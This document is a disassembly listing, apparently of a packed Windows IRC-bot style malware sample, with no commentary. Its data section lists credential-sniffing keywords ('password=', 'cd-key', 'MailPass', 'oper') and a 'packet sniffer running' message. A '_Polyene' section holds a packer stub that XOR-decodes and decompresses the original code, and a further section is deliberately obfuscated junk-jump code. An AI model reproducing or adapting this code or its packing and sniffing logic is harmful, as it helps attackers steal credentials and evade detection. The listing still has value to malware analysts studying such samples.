aCdKey db 'cd key',0 ; DATA XREF: .data:0041D788�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: .data:0041D780�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: .data:0041D778�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: .data:0041D770�o
align 4
aAuth db 'auth ',0 ; DATA XREF: .data:0041D768�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: .data:0041D760�o
align 4
aLogin_0 db 'login ',0 ; DATA XREF: .data:off_41D758�o
align 10h
aPw db 'pw=',0 ; DATA XREF: .data:0041D74C�o
aPass_1 db 'pass=',0 ; DATA XREF: .data:0041D744�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: .data:0041D73C�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: .data:0041D734�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: .data:0041D72C�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: .data:0041D724�o
aAuth_0 db ' :auth ',0 ; DATA XREF: .data:0041D71C�o
aIdentify db 'identify ',0 ; DATA XREF: .data:0041D714�o
align 4
aOper db 'oper ',0 ; DATA XREF: .data:0041D70C�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: .data:0041D708�o
align 4
aPass_2 db 'pass ',0 ; DATA XREF: .data:0041D704�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: .data:0041D700�o
align 10h
aUser_1 db 'user ',0 ; DATA XREF: .data:off_41D6FC�o
align 4
dword_41D9A8 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_415F69+5CE�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41D9DC db 2Dh ; - ; DATA XREF: sub_415F69+1A6�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_41DA10 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DA34h, 0DCD88992h, 0CEBA94B3h
dd 0B4ACFFE6h, 2 dup(0)
dword_41DA48 dd 0A1C21D0Eh ; DATA XREF: sub_40A9CF+843�r
; sub_4167F1+54�r ...
dword_41DA4C dd 0D6AF099Eh ; DATA XREF: sub_4167F1+4C�r
dword_41DA50 dd 0ED38F9D8h ; DATA XREF: sub_4167F1+41�r
dword_41DA54 dd 5D58CED8h ; DATA XREF: sub_4167F1+3B�r
dd 0
off_41DA5C dd offset dword_41DD44 ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
dd 2 dup(0)
off_41DA68 dd offset dword_41CC4C ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DA6C dd offset dword_41CC40 ; DATA XREF: sub_40CF2F+B8�r
dword_41DA70 dd 0 ; DATA XREF: sub_40CF2F+D0�r
; sub_40CF2F+DF�r
dd offset dword_41CC2C
dd offset dword_41CC20
align 10h
or ah, cl
inc ecx
add ah, bh
retf
; ---------------------------------------------------------------------------
dw 41h
dd 0
dd offset dword_41CBE8
dd offset dword_41CBDC
dd 4 dup(0)
dword_41DAA4 dd 8F88D9DDh, 81F1C5A2h, 2 dup(0) ; DATA XREF: sub_40D043:loc_40D31F�o
; sub_40D871:loc_40DCB8�o
dword_41DAB4 dd 73616C23h, 74h, 1Eh dup(0) ; DATA XREF: sub_40332B+1A1�o
; sub_4093B6+6C�o ...
byte_41DB34 db 0C1h ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 85h, 0D8h, 0DFh
dd 0F1h, 1Eh dup(0)
byte_41DBB4 db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 4
dd 1Fh dup(0)
dword_41DC34 dd 3430032Eh, 2036202h, 0 ; DATA XREF: sub_40A9CF:loc_40C4DA�o
; sub_40D871+242�o
dword_41DC40 dd 0D3D58395h, 90FCC9F1h, 0B2FCACh, 3Eh dup(0) ; DATA XREF: sub_406A23+2E�o
; sub_406AE7+2E�o
dword_41DD44 dd 0DFDFA6C8h, 0DBA0D4F2h, 0BCh, 0 ; DATA XREF: .data:off_41DA5C�o
dword_41DD54 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: .text:00416B0D�o
aEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 4
aEntry db 'entry',0 ; DATA XREF: .text:00416AE7�o
align 4
aLoop db 'loop',0 ; DATA XREF: .text:loc_416AC5�o
align 4
aPing08x db 'PING :%08X',0 ; DATA XREF: sub_4167F1+263�o
align 10h
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: sub_4167F1+5A�o
align 10h
dword_41DDD0 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh ; DATA XREF: sub_416E4E+15�o
dword_41DDE0 dd 4172BCh, 0 ; DATA XREF: .rdata:off_4172B4�o
; .rdata:00417394�o
a_?av_com_error db '.?AV_com_error@@',0
align 10h
aRa db '¼rA',0 ; DATA XREF: .rdata:off_417308�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DE18 dd 0 ; DATA XREF: sub_401856:loc_40186E�r
; sub_401856+21�r ...
dword_41DE1C dd 0 ; DATA XREF: sub_401856:loc_401883�r
; sub_401856+36�r ...
dword_41DE20 dd 0 ; DATA XREF: sub_401856:loc_401898�r
; sub_401856+4B�r ...
dword_41DE24 dd 0 ; DATA XREF: sub_401856+3�r
; sub_401856+C�r ...
dd 0
dword_41DE2C dd 0 ; DATA XREF: sub_4018AF+40�r
; sub_4018AF+62�r ...
byte_41DE30 db 0 ; DATA XREF: sub_401981+1BA�o
; sub_402A32+57�r ...
align 8
dword_41DE38 dd 0 ; DATA XREF: sub_40332B+1A�r
; sub_404CBB+1B�r ...
dword_41DE3C dd 1 ; DATA XREF: sub_40332B+B�o
dword_41DE40 dd 77E7C706h ; DATA XREF: sub_403BD3+28�w
; sub_409C36+12�r ...
align 8
dword_41DE48 dd 71C245E0h ; DATA XREF: sub_403BD3+53�w
dword_41DE4C dd 71C243F6h ; DATA XREF: sub_403BD3+66�w
dword_41DE50 dd 71C59904h ; DATA XREF: sub_403BD3+79�w
dword_41DE54 dd 71C453F8h ; DATA XREF: sub_403BD3+8C�w
dword_41DE58 dd 71C2FA86h ; DATA XREF: sub_403BD3+9F�w
dword_41DE5C dd 71C574FAh ; DATA XREF: sub_403BD3+B2�w
dword_41DE60 dd 71C214BAh ; DATA XREF: sub_403BD3+C5�w
dword_41DE64 dd 71C4A1B4h ; DATA XREF: sub_403BD3+D8�w
dword_41DE68 dd 71C59530h ; DATA XREF: sub_403BD3+EB�w
dword_41DE6C dd 71B2ACCBh ; DATA XREF: sub_403BD3+112�w
dword_41DE70 dd 71B22C25h ; DATA XREF: sub_403BD3+125�w
dword_41DE74 dd 71B2A381h ; DATA XREF: sub_403BD3+138�w
dword_41DE78 dd 71B28D0Dh ; DATA XREF: sub_403BD3+14B�w
dword_41DE7C dd 7622A3F4h ; DATA XREF: sub_403BD3+219�w
; sub_408B30+118�r ...
dword_41DE80 dd 5E0C4E7Dh ; DATA XREF: sub_403BD3+1F2�w
; sub_414EF4+6C�r ...
dword_41DE84 dd 71AB33DFh ; DATA XREF: sub_403BD3+16C�w
; sub_403BD3+197�r ...
dword_41DE88 dd 71ABC076h ; DATA XREF: sub_4020C2+DB�r
; sub_403BD3+17F�w ...
dword_41DE8C dd 71AB3A2Ch ; DATA XREF: sub_403BD3+192�w
; sub_403BD3+1A9�r ...
dd 101h dup(0)
dword_41E294 dd 0 ; DATA XREF: sub_4042FB+3�r
; sub_4042FB+20�o
dword_41E298 dd 0 ; DATA XREF: sub_4042FB+12�o
; sub_4042FB:loc_404327�r
align 10h
dword_41E2A0 dd 76BF1C22h ; DATA XREF: sub_405FA3+46�w
; sub_405FA3+7A�r ...
dword_41E2A4 dd 76BF1D54h ; DATA XREF: sub_405FA3+59�w
; sub_405FA3+83�r ...
dword_41E2A8 dd 76BF1E6Ch ; DATA XREF: sub_405FA3+6C�w
; sub_405FA3+8C�r ...
dword_41E2AC dd 76BF32DDh ; DATA XREF: sub_405FA3+33�w
; sub_405FA3+71�r ...
dword_41E2B0 dd 14B140h, 0FFFFFFFFh, 5 dup(0) ; DATA XREF: sub_405FA3+4�o
; sub_406041+B�o ...
byte_41E2CC db 1 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E2D0 dd 0 ; DATA XREF: sub_409226+61�w
; sub_409226+77�w ...
align 8
dword_41E2D8 dd 14B168h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_40938F+1A�o
; sub_4095A4+6�o ...
dword_41E2F0 dd 0 ; DATA XREF: sub_40938F+3�w
; sub_4095A4+11�r ...
align 8
dword_41E2F8 dd 1153B20h ; DATA XREF: sub_40938F+15�w
; sub_4095A4+57�r ...
dword_41E2FC dd 0 ; DATA XREF: sub_409CB1+6�r
; sub_409DD0+65�w ...
dword_41E300 dd 0 ; DATA XREF: sub_409DD0+3F�w
; sub_409DD0+44�r ...
dword_41E304 dd 0 ; DATA XREF: sub_409CB1+F6�r
; sub_409DD0+91�w ...
dword_41E308 dd 0 ; DATA XREF: sub_409CB1+B9�r
; sub_409DD0+7B�w ...
align 10h
byte_41E310 db 0 ; DATA XREF: sub_409DD0+29�r
; sub_409DD0+96�w
align 4
dd 101h dup(0)
byte_41E718 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E898 dd 40h dup(0) ; DATA XREF: sub_40CF2F+E�o
; sub_40CF2F+A6�o ...
dword_41E998 dd 3 dup(0) ; DATA XREF: sub_40CF2F+23�o
; sub_40CF2F+36�o ...
dword_41E9A4 dd 0 ; DATA XREF: sub_40CF25+3�r
; sub_40D366+15�r ...
dd 0
dword_41E9AC dd 0 ; DATA XREF: sub_40E618+49�w
; sub_40E618:loc_40E66D�w
byte_41E9B0 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_41EAB4 db 8Bh ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
db 0B9h, 0DBh, 0B0h
dd 8FB3E9B3h, 9A9790C8h, 62FBBADBh, 0
dword_41EAC8 dd 353B9991h, 29C9A16Fh, 0F3E975C5h, 37BBFFA3h, 0
; DATA XREF: sub_40ED6E+29�o
; sub_40ED6E+35�o ...
dword_41EADC dd 2AFB5165h ; DATA XREF: sub_4102AE+1D�o
; sub_410318+7�w ...
dword_41EAE0 dd 4F53F7A4h ; DATA XREF: sub_4102AE+2D�o
; sub_410318+11�w ...
dword_41EAE4 dd 1FE21E18h ; DATA XREF: sub_4102AE+3D�o
; sub_410318+1B�w ...
dword_41EAE8 dd 79559065h ; DATA XREF: sub_4102AE+4D�o
; sub_410318+25�w ...
align 10h
byte_41EAF0 db 0E2h ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
db 0E6h, 0B7h, 0B0h
dd 0BECEFA9Dh, 0D3DE90C8h, 0B1F7D5FBh, 2 dup(0)
dword_41EB08 dd 2 dup(0) ; DATA XREF: sub_41113B+7E8�o
dword_41EB10 dd 0 ; DATA XREF: sub_411DC5+557�o
dword_41EB14 dd 2 dup(0) ; DATA XREF: sub_411DC5+579�o
dword_41EB1C dd 0 ; DATA XREF: sub_4127D0+9�r
; sub_4127D0+16�w
dword_41EB20 dd 0 ; DATA XREF: sub_4127D0+BF�w
; sub_4127D0:loc_4128A0�r
dword_41EB24 dd 2 dup(0) ; DATA XREF: sub_412D4C+3�o
; sub_412E04+7F�o
dword_41EB2C dd 6B636170h, 652E6465h, 6578h, 3Eh dup(0) ; DATA XREF: sub_406E8E+208�o
; sub_407148+172�o ...
dword_41EC30 dd 38997A7Bh ; DATA XREF: sub_40A9CF+838�r
; sub_4167F1+118�w
dword_41EC34 dd 0D98D9A1Dh ; DATA XREF: sub_4167F1+122�w
dword_41EC38 dd 32AED88h ; DATA XREF: sub_4167F1+12C�w
dword_41EC3C dd 253A396Fh ; DATA XREF: sub_4167F1+136�w
dword_41EC40 dd 6B636170h, 652E6465h, 6578h, 3Fh dup(0) ; DATA XREF: sub_40A9CF+C3D�o
; sub_40A9CF+C51�o ...
dword_41ED48 dd 40h dup(0) ; DATA XREF: sub_40A9CF+1082�o
; sub_40A9CF+108E�o ...
byte_41EE48 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EEC8 db 0 ; DATA XREF: sub_403DF3:loc_403F07�r
; sub_403DF3+11F�o ...
align 4
dd 1Fh dup(0)
dword_41EF48 dd 40h dup(0) ; DATA XREF: sub_404279+36�o
; sub_4055E5+746�o ...
byte_41F048 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 1000h
_data ends
; Section 4. (virtual address 00020000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00020000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_Polyene segment para public 'CODE' use32
assume cs:_Polyene
;org 420000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
loc_420000: ; CODE XREF: _94j21ax3:0042A490�j
pusha
mov eax, 0AA00h
push 40h
pop ecx
push eax
push ecx
call ds:dword_420362 ; GlobalAlloc
push eax
push eax
pop edx
push offset sub_401000
mov ebp, [esp]
add esp, 4
sub esp, 4
mov dword ptr [esp], 0AA00h
pop ebx
loc_42002F: ; CODE XREF: .Polyene:00420055�j
mov ch, [ebp+0]
add ch, 0EBh
sub ch, 0FFh
add ch, 0FFh
xor ch, 0FFh
sub ch, 0F1h
sub ch, bl
sub ch, bl
sub ch, 7Eh
add ch, 0A5h
add ch, bl
mov [edx], ch
inc ebp
inc edx
dec ebx
cmp ebx, 0
jnz loc_42002F
mov esi, [esp]
add esp, 4
push eax
mov eax, offset sub_401000
xchg eax, edi
pop eax
push esi
jmp loc_42011F
; =============== S U B R O U T I N E =======================================
sub_42006F proc near ; DATA XREF: .Polyene:loc_42011F�o
push ebp
push edi
xor eax, eax
mov ebx, esi
xor ebp, ebp
add ebx, [esi+4]
add esi, 8
loc_42007D: ; CODE XREF: sub_42006F+23�j
mov dx, [esi]
mov ecx, ebp
inc esi
shr dx, cl
mov dh, 9
loc_420088: ; CODE XREF: sub_42006F+92�j
; sub_42006F+A4�j
cmp esi, ebx
jge loc_420118
dec dh
jz short loc_42007D
shl dl, 1
jnb short loc_420109
push esi
mov ecx, ebp
mov eax, [esi]
shr eax, cl
mov ecx, eax
mov esi, eax
shr ecx, 3
test esi, 4
jz short loc_4200B9
and ecx, 1Fh
shr eax, 8
add ebp, 8
jmp short loc_4200C2
; ---------------------------------------------------------------------------
loc_4200B9: ; CODE XREF: sub_42006F+3D�j
and ecx, 3
shr eax, 5
add ebp, 5
loc_4200C2: ; CODE XREF: sub_42006F+48�j
and esi, 3
test esi, esi
jz short loc_4200D7
dec esi
jz short loc_4200E1
dec esi
jz short loc_4200EB
and eax, 1Fh
add ebp, 5
jmp short loc_4200F1
; ---------------------------------------------------------------------------
loc_4200D7: ; CODE XREF: sub_42006F+58�j
and eax, 1FFFh
add ebp, 0Dh
jmp short loc_4200F1
; ---------------------------------------------------------------------------
loc_4200E1: ; CODE XREF: sub_42006F+5B�j
and eax, 3FFh
add ebp, 0Ah
jmp short loc_4200F1
; ---------------------------------------------------------------------------
loc_4200EB: ; CODE XREF: sub_42006F+5E�j
and eax, 7Fh
add ebp, 7
loc_4200F1: ; CODE XREF: sub_42006F+66�j
; sub_42006F+70�j ...
add eax, 3
mov esi, edi
add ecx, 3
sub esi, eax
rep movsb
pop esi
loc_4200FE: ; CODE XREF: sub_42006F+98�j
cmp ebp, 8
jl short loc_420088
inc esi
sub ebp, 8
jmp short loc_4200FE
; ---------------------------------------------------------------------------
loc_420109: ; CODE XREF: sub_42006F+27�j
mov ecx, ebp
mov eax, [esi]
shr eax, cl
inc esi
mov [edi], al
inc edi
jmp loc_420088
; ---------------------------------------------------------------------------
loc_420118: ; CODE XREF: sub_42006F+1B�j
mov eax, edi
pop edi
sub eax, edi
pop ebp
retn
sub_42006F endp
; ---------------------------------------------------------------------------
loc_42011F: ; CODE XREF: .Polyene:0042006A�j
push offset sub_42006F
pop eax
call eax ; sub_401000
call ds:dword_420366 ; GlobalFree
push 7E5h
pop eax
push eax
mov eax, 40h
xchg eax, ecx
pop eax
jmp short near ptr loc_42013B+1 ; CODE XREF: .Polyene:loc_42013B�j
; ---------------------------------------------------------------------------
db 0F0h, 0FFh, 0F1h
dd 36215FFh, 0EB500042h, 4444F0FFh, 0FE244C8Bh, 0B8504444h
dd 417000h, 0E5685896h, 8B000007h, 0C4832414h, 80068A04h
dd 0E882FFC0h, 0F0F080B6h, 80DFE880h, 0C8C001E8h, 0B1C8C05Fh
dd 0F080D0F6h, 0FFF0803Dh, 802FE880h, 0C22AFFF0h, 0C6FF0188h
dd 0CAFFEB41h, 0F00FA83h, 0FFFFC885h, 685EFFh, 5F004170h
dd 6F68F6FFh, 58004200h, 15FFD0FFh, 420366h, 0C704EC83h
dd 2BD22404h, 83580000h, 4C704ECh, 4024h, 0FFEB5900h, 0F1FFEBF0h
dd 36215FFh, 0FF500042h, 8B4444F0h, 44FE2474h, 4EC8344h
dd 2404C7h, 5D004180h, 2BD268h, 240C8B00h, 8A04C483h, 0D7F6007Dh
dd 8288EF80h, 0D7F672F7h, 0F92AF92Ah, 0F603EF82h, 0F6CF28D7h
dd 0C0F92AD7h, 0C7C068CFh, 453E88A2h, 49C6FFEBh, 0EB00F983h
dd 616E553Ah, 20656C62h, 66206F74h, 69207869h, 726F706Dh
dd 62617474h, 2E656Ch, 796C6F50h, 456E45h, 7373654Dh, 42656761h
dd 41786Fh, 52455355h, 642E3233h, 0F006C6Ch, 0FFFF9285h
dd 8B4444FFh, 44FE2474h, 80006844h, 3C8B0041h, 4C48324h
dd 0BD55F6FFh, 42006Fh, 0D0FF5D95h, 36615FFh, 0C8BF0042h
dd 8B004173h, 568C7h, 83590000h, 4C704ECh, 24h, 18395B00h
dd 18850Fh, 4050000h, 49000000h, 0C3B5352h, 0F5A5A24h
dd 12184h, 0FFE0E900h, 0B850FFFFh, 400000h, 478B5893h
dd 50C3030Ch, 36A15FFh, 0F08B0042h, 310478Bh, 0B9038BD8h
dd 0
; ---------------------------------------------------------------------------
cmp eax, ecx
jz loc_4203CE
test eax, 80000000h
jnz loc_420304
lea eax, [eax+400000h]
inc eax
inc eax
jmp loc_420309
; ---------------------------------------------------------------------------
loc_420304: ; CODE XREF: .Polyene:004202F1�j
and eax, 0FFFFh
loc_420309: ; CODE XREF: .Polyene:004202FF�j
push eax
jmp short near ptr loc_42030A+1 ; CODE XREF: .Polyene:loc_42030A�j
; ---------------------------------------------------------------------------
idiv bh
adc eax, offset word_42036E
push 0
pop ecx
push edx
push ecx
cmp [esp], eax
pop edx
pop edx
jz loc_4203EC
mov [ebx], eax
jmp loc_4203C3
; ---------------------------------------------------------------------------
align 10h
dd 0
dd 0FFFFFF00h, 20355FFh, 2036200h, 5 dup(0)
dd 52454B00h, 334C454Eh, 6C642E32h
db 6Ch, 0
dword_420362 dd 77E736A3h ; DATA XREF: .Polyene:0042000F�r
dword_420366 dd 77E73803h ; DATA XREF: .Polyene:00420127�r
dw 5D8h
db 0E8h, 77h
word_42036E dw 0A5FDh ; DATA XREF: .Polyene:0042030E�o
dd 5CB577E7h, 77E7h, 1680000h, 626F6C47h, 6C416C61h, 636F6Ch
dd 6C47016Fh, 6C61626Fh, 65657246h, 4C01A900h, 4C64616Fh
dd 61726269h, 417972h, 65470129h, 6F725074h, 64644163h
dd 73736572h, 45007500h, 50746978h, 65636F72h
db 2 dup(73h), 0
; ---------------------------------------------------------------------------
loc_4203C3: ; CODE XREF: .Polyene:00420328�j
lea ebx, [ebx+4]
jmp near ptr dword_420140+19Dh
; ---------------------------------------------------------------------------
loc_4203CE: ; CODE XREF: .Polyene:004202E6�j
push eax
mov eax, 14h
neg eax
sub edi, eax
pop eax
jmp near ptr dword_420140+14Fh
; ---------------------------------------------------------------------------
popa
sub esp, 4
mov dword ptr [esp], offset sub_4167F1
pop eax
push eax
retn
; ---------------------------------------------------------------------------
loc_4203EC: ; CODE XREF: .Polyene:00420320�j
push 420225h
pop eax
mov ebx, 420240h
push ecx
push eax
mov eax, 10h
xchg eax, edx
pop eax
push edx
jmp short near ptr loc_420402+1 ; CODE XREF: .Polyene:loc_420402�j
; ---------------------------------------------------------------------------
dd 0F0FFEBF3h, 2546851h, 48B0042h, 4C48324h, 6A15FF50h
dd 83004203h, 4C704ECh, 42024824h, 50515900h, 36E15FFh
dd 0D0FF0042h, 37215FFh, 42h, 2F2h dup(0)
_Polyene ends
; ---------------------------------------------------------------------------
; Section 5. (virtual address 00021000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00021000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_94j21ax3 segment para public 'CODE' use32
assume cs:_94j21ax3
;org 421000h
; START OF FUNCTION CHUNK FOR sub_4284C0
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
loc_421000: ; CODE XREF: sub_4284C0:loc_4211D3�j
cmp al, 0C2h
jz loc_421CE0
mov eax, [ebp+var_4]
mov ax, [eax]
jmp loc_42BA70
; END OF FUNCTION CHUNK FOR sub_4284C0
; =============== S U B R O U T I N E =======================================
sub_421013 proc near ; CODE XREF: _94j21ax3:00425B1C�j
; sub_42BC17+3�p
; FUNCTION CHUNK AT 004216DE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429645 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
call sub_42574E
mov edx, 0CB39536Bh
call sub_4239A5
jmp loc_429645
sub_421013 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426716
loc_42102B: ; CODE XREF: sub_426716:loc_42A229�j
push 4CB31B47h
pop esi
add esi, 0DFE2599Bh
add esi, ebp
add esi, 0D36A8B1Ah
mov [esi], eax
pop esi
loc_421042: ; CODE XREF: sub_428BBD:loc_42AC9D�j
jmp loc_423E83
; END OF FUNCTION CHUNK FOR sub_426716
; =============== S U B R O U T I N E =======================================
sub_421047 proc near ; CODE XREF: _94j21ax3:00426CA3�j
; sub_429848+3�p
; FUNCTION CHUNK AT 0042202F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423924 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004249F6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042573B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426BF7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427498 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427895 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427E88 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00429B4B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A233 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A8E4 SIZE 00000015 BYTES
mov [esp+0], edi
pop edi
shr eax, 6
xor [ebp-8], eax
jmp loc_42202F
sub_421047 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB39
loc_421056: ; CODE XREF: sub_42BB39-32BD�j
add eax, ecx
loc_421058: ; CODE XREF: sub_42C03F:loc_42B1CF�j
call sub_42574E
mov edx, 0D504D785h
call sub_4239A5
push eax
jmp loc_426F87
; END OF FUNCTION CHUNK FOR sub_42BB39
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42106D proc near ; CODE XREF: sub_42AA5F�j
; FUNCTION CHUNK AT 00428DB6 SIZE 0000000D BYTES
push ebp
mov ebp, esp
jmp loc_428DB6
sub_42106D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C48
loc_421076: ; CODE XREF: sub_429C48+A�j
jmp loc_42C1A3
; END OF FUNCTION CHUNK FOR sub_429C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4220B7
loc_42107B: ; CODE XREF: sub_4220B7+C�j
rol eax, 16h
call sub_42A613
loc_421083: ; CODE XREF: sub_423614:loc_42AA55�j
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
or eax, edx
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
call sub_429EF8
loc_421096: ; CODE XREF: _94j21ax3:004277F7�j
jmp nullsub_23
; END OF FUNCTION CHUNK FOR sub_4220B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42109B: ; CODE XREF: sub_423614+3748�j
jmp nullsub_187
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426809
loc_4210A0: ; CODE XREF: sub_426809+5�j
ror eax, 7
mov ds:dword_422268, eax
retn
; END OF FUNCTION CHUNK FOR sub_426809
; =============== S U B R O U T I N E =======================================
sub_4210AA proc near ; CODE XREF: sub_42270C:loc_423148�p
; sub_42430C-DAE�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426DDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426E0D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BF4D SIZE 00000017 BYTES
jnz loc_42BF4D
xchg ebp, ecx
push ecx
xchg ebp, ecx
mov ebp, esp
jmp loc_426DDC
sub_4210AA endp
; =============== S U B R O U T I N E =======================================
sub_4210BC proc near ; DATA XREF: sub_42B3E4+17�o
push eax
push offset sub_42306C
jmp loc_42640D
sub_4210BC endp
; =============== S U B R O U T I N E =======================================
sub_4210C7 proc near ; CODE XREF: sub_426C51+B�j
; sub_424D8C+68B1�p
; FUNCTION CHUNK AT 0042714E SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push 0
push offset sub_421402
jmp loc_42714E
sub_4210C7 endp
; ---------------------------------------------------------------------------
loc_4210D7: ; CODE XREF: _94j21ax3:00422471�j
jnz loc_425566
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4210DD: ; CODE XREF: sub_4272E9+6CE�j
jmp loc_4271D0
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
jle loc_42AF9A
sub ebp, eax
jmp loc_425566
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_4210EF: ; CODE XREF: sub_42C1AE:loc_42178F�j
jnz loc_424ED3
jmp loc_4223BB
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EBE
loc_4210FA: ; CODE XREF: sub_427EBE+13�j
xor eax, esi
add eax, edi
add al, ah
; END OF FUNCTION CHUNK FOR sub_427EBE
; START OF FUNCTION CHUNK FOR sub_421F28
loc_421100: ; CODE XREF: sub_421F28+979F�j
call sub_4294B3
; END OF FUNCTION CHUNK FOR sub_421F28
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421105: ; CODE XREF: sub_42284F:loc_429D68�j
jmp loc_424CBF
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
loc_42110A: ; CODE XREF: _94j21ax3:00428A51�j
jmp loc_42B61C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422AD5
loc_42110F: ; CODE XREF: sub_422AD5+3AC2�j
jmp loc_427B2A
; END OF FUNCTION CHUNK FOR sub_422AD5
; =============== S U B R O U T I N E =======================================
sub_421114 proc near ; DATA XREF: sub_423324:loc_423950�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042A192 SIZE 00000008 BYTES
push esi
push 201F21A0h
pop esi
add esi, 0E0239CD6h
jmp loc_42A192
sub_421114 endp
; =============== S U B R O U T I N E =======================================
sub_421126 proc near ; CODE XREF: _94j21ax3:00425651�j
; _94j21ax3:004282DC�p
; FUNCTION CHUNK AT 004212DC SIZE 00000014 BYTES
xchg eax, [esp+0]
pop eax
push 0BB7617A1h
pop edx
add edx, 0DA0730D0h
or edx, 8DF87739h
jmp loc_4212DC
sub_421126 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_421141: ; CODE XREF: _94j21ax3:00424C01�j
pop edx
; =============== S U B R O U T I N E =======================================
sub_421142 proc near ; CODE XREF: sub_426DA4-2688�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004227A7 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
xchg ecx, [esp-4+arg_0]
jmp loc_4227A7
sub_421142 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
